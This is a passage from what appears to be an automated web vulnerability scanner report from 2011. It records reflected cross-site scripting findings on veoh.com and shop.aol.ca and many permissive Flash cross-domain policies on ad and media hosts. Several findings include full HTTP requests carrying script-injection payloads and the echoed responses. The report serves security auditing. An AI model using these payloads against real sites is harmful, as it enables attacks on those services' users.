Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /video/flag/permalinkId/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)266d5"><script>alert(1)</script>a3477cdc5c1
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:15 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=70
Content-Length: 32288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<input type="hidden" value="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)266d5"><script>alert(1)</script>a3477cdc5c1" id="flagUserAgent" name="flagUserAgent"/>
...[SNIP]...

3.493. http://shop.aol.ca/store/list.adp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.aol.ca
Path:   /store/list.adp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edadc"><script>alert(1)</script>81318b986fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /store/list.adp?edadc"><script>alert(1)</script>81318b986fe=1 HTTP/1.1
Host: shop.aol.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 03 Feb 2011 20:33:04 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 03 Feb 2011 21:03:04 GMT
Content-length: 146
Content-type: text/html
Location: http://shop2.aol.ca/store/list.adp?edadc"><script>alert(1)</script>81318b986fe=1
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive

<html>
<body>
Page relocated <a href="http://shop2.aol.ca/store/list.adp?edadc"><script>alert(1)</script>81318b986fe=1">here.</a>
</body>
</html>

4. Flash cross-domain policy  previous  next
There are 20 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://2e76.v.fwmrm.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://2e76.v.fwmrm.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: 2e76.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cph="1295039779.438.1.1,"; _vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,"; _uid="a104_5562153497824379009"; _wr="g11951"; _auv="g11951~5.1296076541.0,12670.1296075237.880,12671.1296076541.0,^"; _cvr="1296076529^11575^sg11951~sg11611^0~0^2206.000000~0.000000,"; _pr="1296076540.8163.209169~209170~,1296076434.7120.209169~209170~,1296076334.4450.209169~209170~,1296076263.3972.209169~209170~,1296076138.3959.209169~209170~,1296076027.4830.209169~209170~,1296075922.4171.209169~209170~,1296075822.3611.209169~209170~,1296075754.4614.209169~209170~,1296075621.9008.209169~209170~,1296075510.8419.209169~209170~,1296075405.9586.209169~209170~,1296075304.8942.209169~209170~,1296075235.1965.209169~209170~,1296075101.798.209169~209170~,1296074990.1228.209169~209170~,1296074859.104.209169~209170~,1296074758.1162.209169~209170~,1296074642.5926.209169~209170~,1296074515.1669.209169~209170~,1296074405.2652.209169~209170~,1296074299.7276.209169~209170~,1296074199.8486.209169~209170~,1296074130.5588.209169~209170~,1296074005.5439.209169~209170~,1296073893.9848.209169~209170~,1296073785.9641.209169~209170~,1296073682.7603.209169~209170~,1296073611.6354.209169~209170~,1296073486.2138.209169~209170~,1296073374.8594.209169~209170~,1296073267.5235.209169~209170~,1296073166.3153.209169~209170~,1296073098.1567.209169~209170~,1296072968.5610.209169~209170~,"; _sc="sg11951.1296072535.1296076541.28800.2377.0,"

Response

HTTP/1.1 200 OK
Content-Type: text/xml
ETag: "4064124649"
Last-Modified: Thu, 03 Jan 2008 02:21:46 GMT
Cteonnt-Length: 302
Date: Thu, 03 Feb 2011 21:07:30 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Set-Cookie: NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3945525d5f4f58455e445a4a423209;path=/;httponly
Cache-Control: private
Content-Length: 302

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for FreeWheel Media Servers. For support contact webmaster at
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.2. http://adserver.adtechus.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/12368/html/swf/AdManager.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

4.3. http://app.scanscout.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.scanscout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: app.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:07:34 GMT
Server: Apache
Last-Modified: Fri, 17 Jul 2009 15:29:39 GMT
ETag: "2e0ae0-117-46ee874ddbec0"
Accept-Ranges: bytes
Content-Length: 279
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<s
...[SNIP]...

4.4. http://audience.visiblemeasures.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://audience.visiblemeasures.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: audience.visiblemeasures.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:07:56 GMT
Content-Type: application/xml
Content-Length: 169
Last-Modified: Thu, 04 Nov 2010 01:46:34 GMT
Server: Jetty(7.x.y-SNAPSHOT)

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

4.5. http://beacon.securestudies.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.securestudies.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: beacon.securestudies.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Vary: Accept-Encoding
Expires: Fri, 04 Feb 2011 21:07:36 GMT
Date: Thu, 03 Feb 2011 21:07:36 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.6. http://bp.specificclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bp.specificclick.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/xml
Content-Length: 193
Date: Thu, 03 Feb 2011 19:11:24 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policySYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

4.7. http://c.brightcove.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=486&height=322&flashID=myExperience700903960001&bgcolor=%23FFFFFF&playerID=64829845001&playerKey=AQ~~%2CAAAADnAS0wE~%2CddeyF9dBubzZEABHXI8Tafb593RYf5ad&isVid=true&dynamicStreaming=true&%40videoPlayer=700903960001&autoStart=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Tue, 21 Dec 2010 18:59:05 UTC

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Last-Modified: Tue, 01 Feb 2011 21:45:33 UTC
Cache-Control: must-revalidate,max-age=0
Content-Type: application/xml
Content-Length: 387
Date: Thu, 03 Feb 2011 19:34:37 GMT
Server:

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.8. http://cdn.gigya.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Length: 509
Content-Type: text/xml
Last-Modified: Thu, 27 Aug 2009 08:53:58 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
x-server: web103
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Fri, 04 Feb 2011 02:02:16 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="widgets.doubleclick.net" to-ports="80" />
...[SNIP]...
<allow-access-from domain="widgets.doubleclick.net" to-ports="443" secure="false" />
...[SNIP]...

4.9. http://col.stc.s-msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://col.stc.s-msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: col.stc.s-msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT
Accept-Ranges: bytes
ETag: "06e6dae977dc81:0",
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Server: co1mppstca03
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Fri, 04 Feb 2011 17:55:20 GMT
Content-Length: 224
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="http://autoshow.autos.msn.com" />
<allow-access-from domain="http://stb.msn.com" />
<allow-access-from domain="*"/>
...[SNIP]...

4.10. http://dev.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Mon, 13 Dec 2010 18:38:09 GMT
Accept-Ranges: bytes
ETag: "a908de3f49acb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 04 Feb 2011 01:49:40 GMT
Connection: close
Content-Length: 277

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...

4.11. http://gscounters.gigya.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gscounters.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:271f"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web202
X-Powered-By: ASP.NET
Date: Fri, 04 Feb 2011 02:02:15 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

4.12. http://ll.static.abc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ll.static.abc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ll.static.abc.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=150
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8067593ddb1cb1:1a129"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc02
Cache-Expires: Thu, 03 Feb 2011 16:07:43 GMT
Content-Length: 224
X-UA-Compatible: IE=EmulateIE7
Date: Fri, 04 Feb 2011 01:59:12 GMT
Last-Modified: Tue, 11 Jan 2011 22:19:13 GMT
Expires: Fri, 04 Feb 2011 02:01:42 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>

<allow-access-from domain="*" secure="false" />

...[SNIP]...

4.13. http://superpages.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://superpages.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: superpages.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:17:34 GMT
Server: Omniture DC/2.0.0
xserver: www17
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.14. http://uat.netmng.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://uat.netmng.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: uat.netmng.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:10:56 GMT
Server: Apache/2.2.9
Last-Modified: Mon, 13 Dec 2010 13:30:04 GMT
ETag: "1b6168-6a-4974ab3a2af00"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.15. http://a.abc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a.abc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.abc.com

Response

HTTP/1.0 200 OK
Content-Length: 856
Content-Type: text/xml
Last-Modified: Tue, 11 Jan 2011 22:19:00 GMT
Accept-Ranges: bytes
ETag: "062b58bddb1cb1:5799"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed09
X-Powered-By: ASP.NET
Cache-Expires: Tue, 11 Jan 2011 22:26:38 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=246
Date: Fri, 04 Feb 2011 02:02:28 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.abc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.dig.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.disney.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.hulu.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" secure="false" />
...[SNIP]...
<allow-access-from domain="afv.dev.dave.tv" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn.media.soapnet.com" secure="false" />
...[SNIP]...
<allow-access-from domain="soapnet.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wdig.vo.llnwd.net" secure="false" />
...[SNIP]...
<allow-access-from domain="widgets.clearspring.com" secure="false" />
...[SNIP]...

4.16. http://adadvisor.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:54:51 GMT
Server: Apache
Last-Modified: Fri, 21 Jan 2011 20:30:42 GMT
ETag: "165-49a611fc44056"
Accept-Ranges: bytes
Content-Length: 357
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...

4.17. http://ak1.ostkcdn.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ak1.ostkcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: ak1.ostkcdn.com
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1787227/3-inBannerVideo2011_ViPrPf_New.swf?clickTag=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3aa3%2F3%2F0%2F%252a%2Ff%253B234670317%253B0-0%253B0%253B58524542%253B4307-300%2F250%253B40113270%2F40131057%2F2%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Efdr%253D234572024%253B0-0%253B0%253B32934908%253B4307-300%2F250%253B40173662%2F40191449%2F1%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Esscs%253D%253f&xmlFile=InBannerVideo_ViPrPf_LongboardVA_ronQ1.xml&taxonomyId=2&taxonomyType=sto&productCID=654321&keywords=&skus=12370379|12958970|11254000|12370390|10927901|11915556|13002490|10738953|12970899|12532546|12130097|12753446|11551645|066987|11144650|10355113|13197342|12941235|12370383|12978335|12453900
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 16 Dec 2010 06:09:38 GMT
Accept-Ranges: bytes
ntCoent-Length: 230
Content-Type: text/x-cross-domain-policy
X-Pad: avoid browser bug
Cache-Control: private
Date: Thu, 03 Feb 2011 22:00:35 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 230

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-content-type"/>
<allow-access-from domain="*.overstock.com"/>
<allow-access-from domain="*.ostkcdn.com"/>
...[SNIP]...

4.18. http://ak2.ostkcdn.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ak2.ostkcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

